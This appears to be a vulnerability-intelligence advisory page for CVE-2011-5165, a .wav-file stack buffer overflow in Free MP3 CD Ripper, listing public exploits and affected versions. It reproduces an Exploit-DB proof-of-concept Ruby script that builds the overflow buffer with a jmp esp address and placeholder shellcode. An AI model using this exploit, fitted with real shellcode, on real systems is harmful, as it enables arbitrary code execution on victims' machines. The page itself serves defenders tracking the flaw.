VIR Vulnerability Intelligence Relay

CVE-2011-5165

critical
Published 2012-09-15 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Stack-based buffer overflow in Free MP3 CD Ripper 1.1, 2.6 and earlier, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .wav file.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-11975 dos windows verified text ยท 1 KB
Richard leahy ยท 2010-03-30

Free MP3 CD Ripper 2.6 - '.wav' (PoC)

text exploit Source: Exploit-DB 
# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2

#to exploit this  open up the application select file -> wav converter -> wav to mp3

#use your favourite programming language and print out the contents into a text file. save the text #file as a .wav
#then open up the wav file and boom.

#feel free to email me leahy_rich@hotmail.com

#code

!#/usr/bin/env ruby
nop = "\x90" # nop
shellcode = "\xCC" #just an interupt can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76" #find a jmp esp i will use imagehlp  , little endian so reverse it
boom = "A" * 4112 + jmp_esp + nop * 50 + shellcode

puts boom
EDB-18142 local windows verified
Metasploit ยท 2011-11-22

Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)

Source code queued for fetch โ€” refresh in a moment.
EDB-17727 local windows verified
X-h4ck ยท 2011-08-27

Free MP3 CD Ripper 1.1 - Local Buffer Overflow

Source code queued for fetch โ€” refresh in a moment.
EDB-36465 local windows verified
TUNISIAN CYBER ยท 2015-03-22

Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow

Source code queued for fetch โ€” refresh in a moment.
EDB-12012 local windows verified
Richard leahy ยท 2010-04-02

Free MP3 CD Ripper 2.6 - '.wav' Local Overflow

Source code queued for fetch โ€” refresh in a moment.
EDB-11976 local windows verified
mr_me ยท 2010-03-31

Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow

Source code queued for fetch โ€” refresh in a moment.
EDB-36826 local windows verified
ThreatActor ยท 2015-04-23

Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)

Source code queued for fetch โ€” refresh in a moment.
EDB-36827 local windows verified
naxxo ยท 2015-04-24

Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)

Source code queued for fetch โ€” refresh in a moment.

Metasploit modules

exploit_windows/fileformat/free_mp3_ripper_wav rank 500
Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
cleanersoftfree_mp3_cd_ripper{"endIncluding":"2.6"}
cleanersoftfree_mp3_cd_ripper1.1
cleanersoftfree_mp3_cd_ripper2.5

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.